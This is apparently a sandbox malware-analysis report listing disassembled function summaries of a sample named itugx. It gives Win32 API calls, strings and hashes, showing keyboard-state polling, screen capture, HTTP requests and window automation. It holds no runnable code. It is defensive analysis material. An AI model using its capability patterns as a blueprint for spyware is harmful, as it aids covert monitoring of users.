                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 1839972693-4113822522
                                                    • Opcode ID: 25627f0d502a97ed2f9eab727fc68a06e83a6ece5a6f25912607e8106e819c48
                                                    • Instruction ID: 081ddcf171e4dbef072a78f0fc6e096e373e5aec99f750cefa420bdd6febb90d
                                                    • Opcode Fuzzy Hash: 25627f0d502a97ed2f9eab727fc68a06e83a6ece5a6f25912607e8106e819c48
                                                    • Instruction Fuzzy Hash: 0971E0326083129FC716EF34C8808AAB7E4FF98754F00496DF8969B661EB35DD85CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadIconW.USER32(00000063), ref: 003762BD
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003762CF
                                                    • SetWindowTextW.USER32(?,?), ref: 003762E6
                                                    • GetDlgItem.USER32 ref: 003762FB
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00376301
                                                    • GetDlgItem.USER32 ref: 00376311
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00376317
                                                    • SendDlgItemMessageW.USER32 ref: 00376338
                                                    • SendDlgItemMessageW.USER32 ref: 00376352
                                                    • GetWindowRect.USER32 ref: 0037635B
                                                    • _wcslen.LIBCMT ref: 003763C2
                                                    • SetWindowTextW.USER32(?,?), ref: 003763FE
                                                    • GetDesktopWindow.USER32 ref: 00376404
                                                    • GetWindowRect.USER32 ref: 0037640B
                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00376462
                                                    • GetClientRect.USER32 ref: 0037646F
                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00376494
                                                    • SetTimer.USER32 ref: 003764BE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                    • String ID:
                                                    • API String ID: 895679908-0
                                                    • Opcode ID: b4723b5610f8ba618166a872af2152c38be481d5cc1da8a9e4c5c6920833f98e
                                                    • Instruction ID: 545586b7d7dbbfe0ec0e33a82dc33b2947b34f77c0a67788322576556d039b1e
                                                    • Opcode Fuzzy Hash: b4723b5610f8ba618166a872af2152c38be481d5cc1da8a9e4c5c6920833f98e
                                                    • Instruction Fuzzy Hash: 42719231900B05EFDB32DFA9CE56AAEBBF9FF48704F104518E14AA25A0D779E944CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00390784
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 0039078F
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0039079A
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 003907A5
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 003907B0
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 003907BB
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 003907C6
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 003907D1
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 003907DC
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 003907E7
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 003907F2
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 003907FD
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00390808
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00390813
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 0039081E
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00390829
                                                    • GetCursorInfo.USER32(?), ref: 00390839
                                                    • GetLastError.KERNEL32 ref: 0039087B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                    • String ID:
                                                    • API String ID: 3215588206-0
                                                    • Opcode ID: 968da39b4edabadf585af1e9efeb0de8c159b5ad7f3835a7573a947fecf46032
                                                    • Instruction ID: 2a545dc143c48bb24698cbd61ec60d485d5b32df77c6ecdbd82d7c8a012a8b3e
                                                    • Opcode Fuzzy Hash: 968da39b4edabadf585af1e9efeb0de8c159b5ad7f3835a7573a947fecf46032
                                                    • Instruction Fuzzy Hash: B1418570E083196EDB15DFBA8C8985EBFE8FF04354B50452AE11DEB691DA78E801CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CharLowerBuffW.USER32(00000000,00000000,003ADCD0), ref: 00384E81
                                                    • _wcslen.LIBCMT ref: 00384E95
                                                    • _wcslen.LIBCMT ref: 00384EF3
                                                    • _wcslen.LIBCMT ref: 00384F4E
                                                    • _wcslen.LIBCMT ref: 00384F99
                                                    • _wcslen.LIBCMT ref: 00385001
                                                      • Part of subcall function 0032FD60: _wcslen.LIBCMT ref: 0032FD6B
                                                    • GetDriveTypeW.KERNEL32(?,003D7C10,00000061), ref: 0038509D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2055661098-1000479233
                                                    • Opcode ID: 581fb3481df0bacb93fc47b2013ad6d9598447636227c74df930acfe62d9555d
                                                    • Instruction ID: af92e5e15885d1e24eaa1326a3e3dc00f477124a29ba540ca07b31f49940b91e
                                                    • Opcode Fuzzy Hash: 581fb3481df0bacb93fc47b2013ad6d9598447636227c74df930acfe62d9555d
                                                    • Instruction Fuzzy Hash: 54B138716083029FC716EF28D890A6AB7E5FFA4710F50495DF596CB291EB30DC84CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,003ADCD0), ref: 00394A18
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00394A2A
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,003ADCD0), ref: 00394A4F
                                                    • FreeLibrary.KERNEL32(00000000,?,003ADCD0), ref: 00394A9B
                                                    • StringFromGUID2.OLE32(?,?,00000028,?,003ADCD0), ref: 00394B05
                                                    • SysFreeString.OLEAUT32(00000009), ref: 00394BBF
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00394C25
                                                    • SysFreeString.OLEAUT32(?), ref: 00394C4F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 354098117-199464113
                                                    • Opcode ID: b784c4471e05d0c2d166d372715331be89240e52fc2b92078f50a2831aaee17f
                                                    • Instruction ID: 19fb83db03bb090d67523662289d592d09e2e1ba14ec8dcb334d8ddae26b4109
                                                    • Opcode Fuzzy Hash: b784c4471e05d0c2d166d372715331be89240e52fc2b92078f50a2831aaee17f
                                                    • Instruction Fuzzy Hash: 1E123B75A00115EFDF16DF94C884EAEBBB9FF49314F258098E906AB251D731ED42CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0038CE0D
                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0038CE20
                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0038CE34
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0038CE4D
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0038CE90
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0038CEA6
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0038CEB1
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0038CEE1
                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0038CF39
                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0038CF4D
                                                    • InternetCloseHandle.WININET(00000000), ref: 0038CF58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                    • String ID:
                                                    • API String ID: 3800310941-3916222277
                                                    • Opcode ID: fa742b55d43d3559c255250f82a17899ff96f25d65c6ec1b8e47efcb05db0a4f
                                                    • Instruction ID: 08b0e131b7ffb823efe2077423547db1240baa1f6f85ab796d4b700a4be7d373
                                                    • Opcode Fuzzy Hash: fa742b55d43d3559c255250f82a17899ff96f25d65c6ec1b8e47efcb05db0a4f
                                                    • Instruction Fuzzy Hash: 8E518BB0510308BFEB22AF60CC48AAA7BFDFF09744F008459FA4686550D735E904DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 003A8EF1
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8F01
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8F0C
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8F19
                                                    • GlobalLock.KERNEL32 ref: 003A8F27
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8F36
                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8F3F
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8F46
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8F57
                                                    • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,003B0C04,?), ref: 003A8F70
                                                    • GlobalFree.KERNEL32 ref: 003A8F80
                                                    • GetObjectW.GDI32(?,00000018,?,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003A8FA0
                                                    • CopyImage.USER32 ref: 003A8FD0
                                                    • DeleteObject.GDI32(?), ref: 003A8FF8
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003A900E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3840717409-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00392F35
                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00392F45
                                                    • CreateCompatibleDC.GDI32(?), ref: 00392F51
                                                    • SelectObject.GDI32(00000000,?), ref: 00392F5E
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00392FCA
                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00393009
                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0039302D
                                                    • SelectObject.GDI32(?,?), ref: 00393035
                                                    • DeleteObject.GDI32(?), ref: 0039303E
                                                    • DeleteDC.GDI32(?), ref: 00393045
                                                    • ReleaseDC.USER32 ref: 00393050
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetMenuItemInfoW.USER32(003E2990,000000FF,00000000,00000030), ref: 0037C888
                                                    • SetMenuItemInfoW.USER32 ref: 0037C8BD
                                                    • Sleep.KERNEL32(000001F4), ref: 0037C8CF
                                                    • GetMenuItemCount.USER32 ref: 0037C915
                                                    • GetMenuItemID.USER32(?,00000000), ref: 0037C932
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 0037C95E
                                                    • GetMenuItemID.USER32(?,?), ref: 0037C9A5
                                                    • CheckMenuRadioItem.USER32 ref: 0037C9EB
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0037CA00
                                                    • SetMenuItemInfoW.USER32 ref: 0037CA21
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                    • String ID: 0
                                                    • API String ID: 1460738036-4108050209
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0037E3E9
                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0037E40F
                                                    • _wcslen.LIBCMT ref: 0037E419
                                                    • _wcsstr.LIBVCRUNTIME ref: 0037E469
                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0037E485
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 1939486746-1459072770
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0038469A
                                                    • _wcslen.LIBCMT ref: 003846C7
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 003846F7
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00384718
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00384728
                                                    • DeviceIoControl.KERNEL32 ref: 003847AF
                                                    • CloseHandle.KERNEL32(00000000), ref: 003847BA
                                                    • CloseHandle.KERNEL32(00000000), ref: 003847C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 1149970189-3457252023
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • timeGetTime.WINMM ref: 0037EEE0
                                                      • Part of subcall function 0032F27E: timeGetTime.WINMM(?,?,0037EF00), ref: 0032F282
                                                    • Sleep.KERNEL32(0000000A), ref: 0037EF0D
                                                    • EnumThreadWindows.USER32(?,Function_0006EE91,00000000), ref: 0037EF31
                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0037EF53
                                                    • SetActiveWindow.USER32 ref: 0037EF72
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0037EF80
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0037EF9F
                                                    • Sleep.KERNEL32(000000FA), ref: 0037EFAA
                                                    • IsWindow.USER32 ref: 0037EFB6
                                                    • EndDialog.USER32(00000000), ref: 0037EFC7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • _free.LIBCMT ref: 00343024
                                                      • Part of subcall function 00342D58: RtlFreeHeap.NTDLL(00000000,00000000,?,0034DB71,003E1DC4,00000000,003E1DC4,00000000,?,0034DB98,003E1DC4,00000007,003E1DC4,?,0034DF95,003E1DC4), ref: 00342D6E
                                                      • Part of subcall function 00342D58: GetLastError.KERNEL32(003E1DC4,?,0034DB71,003E1DC4,00000000,003E1DC4,00000000,?,0034DB98,003E1DC4,00000007,003E1DC4,?,0034DF95,003E1DC4,003E1DC4), ref: 00342D80
                                                    • _free.LIBCMT ref: 00343030
                                                    • _free.LIBCMT ref: 0034303B
                                                    • _free.LIBCMT ref: 00343046
                                                    • _free.LIBCMT ref: 00343051
                                                    • _free.LIBCMT ref: 0034305C
                                                    • _free.LIBCMT ref: 00343067
                                                    • _free.LIBCMT ref: 00343072
                                                    • _free.LIBCMT ref: 0034307D
                                                    • _free.LIBCMT ref: 0034308B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID: &;
                                                    • API String ID: 776569668-2531589788
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0037A8EE
                                                    • SetKeyboardState.USER32(?), ref: 0037A959
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 0037A979
                                                    • GetKeyState.USER32(000000A0), ref: 0037A990
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 0037A9BF
                                                    • GetKeyState.USER32(000000A1), ref: 0037A9D0
                                                    • GetAsyncKeyState.USER32(00000011), ref: 0037A9FC
                                                    • GetKeyState.USER32(00000011), ref: 0037AA0A
                                                    • GetAsyncKeyState.USER32(00000012), ref: 0037AA33
                                                    • GetKeyState.USER32(00000012), ref: 0037AA41
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 0037AA6A
                                                    • GetKeyState.USER32(0000005B), ref: 0037AA78
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDlgItem.USER32 ref: 00376571
                                                    • GetWindowRect.USER32 ref: 0037658A
                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 003765E8
                                                    • GetDlgItem.USER32 ref: 003765F8
                                                    • GetWindowRect.USER32 ref: 0037660A
                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 0037665E
                                                    • GetDlgItem.USER32 ref: 0037666C
                                                    • GetWindowRect.USER32 ref: 0037667E
                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 003766C0
                                                    • GetDlgItem.USER32 ref: 003766D3
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003766E9
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 003766F6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003121E4: GetWindowLongW.USER32(?,000000EB), ref: 003121F2
                                                    • GetSysColor.USER32(0000000F), ref: 00312102
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
